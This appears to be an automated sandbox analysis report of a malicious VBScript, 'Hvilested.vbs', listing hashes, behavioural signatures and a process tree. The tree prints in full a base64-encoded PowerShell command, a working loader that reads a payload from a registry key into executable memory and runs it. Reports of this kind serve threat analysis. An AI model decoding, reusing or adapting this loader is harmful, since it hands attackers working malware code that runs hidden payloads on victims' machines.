Analysis
-
max time kernel
152s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 21:12
Static task
static1
Behavioral task
behavioral1
Sample
Hvilested.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Hvilested.vbs
Resource
win10v2004-20220812-en
General
-
Target
Hvilested.vbs
-
Size
135KB
-
MD5
36b1f36ea9b9752a8af52202daeebfd3
-
SHA1
a3e4e48fe2c1897930dce07e758e1e590a00d2ad
-
SHA256
8b4d69556cd93e5b27c7fdc3a7e765fcb6f45ebd8451ee4e9fa9a515aac6811d
-
SHA512
d3172ec500241d744319495b585d558ffd625f767f333d1751b1fa6fa25401db8253bd97892a91e994cffbad0df1925f0f6abdb7bb61fff0b1b2cd6ed59da466
-
SSDEEP
1536:TjeOZx8kZRMuKPheRTHNo2rNo8EgnxTwBII9zLKFisRxcyeC2X2qCLmob8OVPeVv:TKwtAWTBRnxTbvcoU0L78OVGvUc
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1944 powershell.exe 1944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1944 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.exepowershell.execsc.exedescription pid process target process PID 3048 wrote to memory of 1944 3048 WScript.exe powershell.exe PID 3048 wrote to memory of 1944 3048 WScript.exe powershell.exe PID 3048 wrote to memory of 1944 3048 WScript.exe powershell.exe PID 1944 wrote to memory of 5000 1944 powershell.exe csc.exe PID 1944 wrote to memory of 5000 1944 powershell.exe csc.exe PID 1944 wrote to memory of 5000 1944 powershell.exe csc.exe PID 5000 wrote to memory of 3108 5000 csc.exe cvtres.exe PID 5000 wrote to memory of 3108 5000 csc.exe cvtres.exe PID 5000 wrote to memory of 3108 5000 csc.exe cvtres.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Hvilested.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAEUARwBJAFYAIABBAGYAcwBhAGEAYgBsAGEAbgBrADkAIABrAG8AbgBuAGUAawBzAGkAIABSAEUARQBWAE8ASwBFAFMAUwBIACAAUwBLAFUATQAgAHMAcABvAG8AbgBoACAAYgByAGQAcgAgAGEAbgB0AGkAZgBvAHIAZQBpACAARgBpAGoAaQA2ACAAbwB1AHQAYwBoAGEAcgBtACAAcQB1AGEAcgB0AGUAcgAgAEYAZQByAHQAaQAgAEoAbwByAGQAcwBwAGUAawAyACAAQgByAG8AbgB6AGkANgAgAEQAQQBUAEEAQgAgAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE4ATwBOAFMAQQBOAEcAVQBJAE4AMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHAAbwBtAG0AZQByAHAAZQBsAG8ANQAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwA2ACwAaQBuAHQAIABwAG8AbQBtAGUAcgBwAGUAbABvADcALABpAG4AdAAgAHAAbwBtAG0AZQByAHAAZQBsAG8AOAAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFMAbABlAGUAcAAoAHUAaQBuAHQAIABOAE8ATgBTAEEATgBHAFUASQBOADAALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4AMQAsAGkAbgB0ACAATgBPAE4AUwBBAE4ARwBVAEkATgAyACwAaQBuAHQAIABOAE8ATgBTAEEATgBHAFUASQBOADMALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4ANAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABwAG8AbQBtAGUAcgBwAGUAbABvADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAHAAbwBtAG0AZQByAHAAZQBsAG8AMgAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwAzACkAOwAJAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFoAdwBBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATgBPAE4AUwBBAE4ARwBVAEkATgA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABGAHIAcwB0AGUAbQBhAG4AZABzACwAaQBuAHQAIABwAG8AbQBtAGUAcgBwAGUAbABvACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBTAEEATgBHAFUASQBOACwAaQBuAHQAIABQAGUAcgBzADEALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4ANwApADsADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAZgBsAG8AcwBrAHUAbAAgAHAAYQBjAGUAbQAgAFMAdAByAGsAYgA0ACAARABFAEYAQQBDACAAUwB1AHAAcgBhADUAIABkAGUAbgBvAHQAYQB0AGkAIAB0AHYAYQBuAGcAcwBmAGoAZQAgAEUAcgBpAGMAYQBzAHAAbwAgAHMAbgBlAGIAcgBzACAAVQBkAHMAawB5AGQAbgBpAG4AZwA1ACAAUgBlAGEAcwBvACAAQQBsAGIAaQBuAGkAcwBtADEAIABpAG4AZgBhAGwAbABpAGIAIABDAGgAYQBtAHAAYQBnAG4AZQAgAFIAdQBzAHMAZQByACAAUwBFAE4ATgBJAEcASABUAFMAIABHAGEAbABsAGkAYwBtAGUAdAA1ACAARAB2AHIAZwBwAGkAbABlADUAIAB2AGkAbgBkAHIAdQBlACAATQBhAGcAaQBzAHQAIABuAG8AbgByACAAcgBpAGEAbABpAG4AZAAgAFMAVABVAE4ATgBJAE4ARwAgAEwAYQBhAG4AZQBmAG8AbgBkAGUAIABGAE8AUwBUAEUAUgBIAE8ATwAgAFYASQBPAEwAQQBTAFQAQQBOAEUAIAAgAA0ACgAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AMwA9ADAAOwANAAoAJABOAE8ATgBTAEEATgBHAFUASQBOADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATgBPAE4AUwBBAE4ARwBVAEkATgA4AD0AWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAWgB3AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQATgBPAE4AUwBBAE4ARwBVAEkATgAzACwAMAAsAFsAcgBlAGYAXQAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwARgBPAFIASwAiACkALgBOAFUAQwBMAEUAQQBUAA0ACgANAAoAJABTAFYAVQBMAE0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAF0ALAAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAQQBmAGcAcgBmAHQAZQBkAGUAbgA0AC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAFMAVgBVAEwATQBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAFQAZQBsAGUAcwBrAHIAaQA9ADAAOwAgACQAVABlAGwAZQBzAGsAcgBpACAALQBsAHQAIAAkAFMAVgBVAEwATQAuAGMAbwB1AG4AdAAgADsAIAAkAFQAZQBsAGUAcwBrAHIAaQArACsAKQANAAoAewANAAoACQANAAoAWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoACQATgBPAE4AUwBBAE4ARwBVAEkATgAzACsAJABUAGUAbABlAHMAawByAGkALABbAHIAZQBmAF0AJABTAFYAVQBMAE0AWwAkAFQAZQBsAGUAcwBrAHIAaQBdACwAMQApAA0ACgANAAoAfQANAAoAWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoADQAKAA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3il0f5re\3il0f5re.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AC0.tmp" "c:\Users\Admin\AppData\Local\Temp\3il0f5re\CSC704202B644A545E7B5DFF46974B45017.TMP"4⤵PID:3108
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD56dcf2f0906109a34b9c5a544cad81769
SHA15a7bf0948d889d04ebfff24b08739d99d2b4bca8
SHA256b451aa863ebab25359aaadf90e85b35162eafbf1e0d82ee479cdc503f9edbd26
SHA512cde6534b7235c97a8832ab428e3800f470a657cbaa87d1bca6dc17cb01b398673a4a7b437e8d767bf04423e8c5ef142fa0a6d3852258ddf21a0f9e715a3aa1a4
-
Filesize
1KB
MD5d856be58d006567d3ed509ee110bf839
SHA1e31e781ff878b840bb3d9ec6c336d423ac3f9958
SHA2567b2bc5e4e3790ffce9cab0bf8165c05a29afabfebeabc08c6ac5e8ab93783ddb
SHA51201ef2dfc3025fb3fc790d4f25a2e72459d09c1e657367795e16b995b8383bfdc14068747c2637e6ee1d45fbe72a651690f98277ec36bfc86fd01f77126de926f
-
Filesize
695B
MD5064a6660e679021cfee85dc594d08ce8
SHA17c10b7ef48bbb535100943dc90b6aeeaa59e428a
SHA2566ff92c6c4cb841339ce2b5ca496dcafb35f345eca6d401abf3c081bf5f74757b
SHA512152654d72902a5d50469d57ec4fb80a2494f402665956503c7864d52ac140300ff01e66ffe653db9bfe7955377875f25e9d90c4809c5c188002ad08685764162
-
Filesize
369B
MD5de1724783623c45131fa70916540dc89
SHA1197dfc8c875f2065afa3bdbbe926bec5250044b9
SHA256b1cff697ef2c0da25127905f701d8eb40f1af012bbf381984638748eb41f964e
SHA512df514781bf57b60cc6e595fecdf2d174cc8b9b4ce0a33cda993db03a20813a6e03d9266d544670d1391a943dd0ecaaa07540893e072d4bb6d37065add504ca9c
-
Filesize
652B
MD5ec9372ae2716257720381a9aba1c1bdf
SHA1b8eb351ae48be2062dfa5728ad75f91cc0f9e143
SHA256ea60622553a15a42c58a1a2019cb587727a9abd6c1309d5214e2ec8b4a8a623d
SHA512f1cb3d17b12f7bd67d1251d06b8fa5b3ee3eb5f18c3bb93edb2fac0fda67e1db40a1ab86156521974112bc604ae0af1948e1a0f27b07102cfb4b12b35bcaa722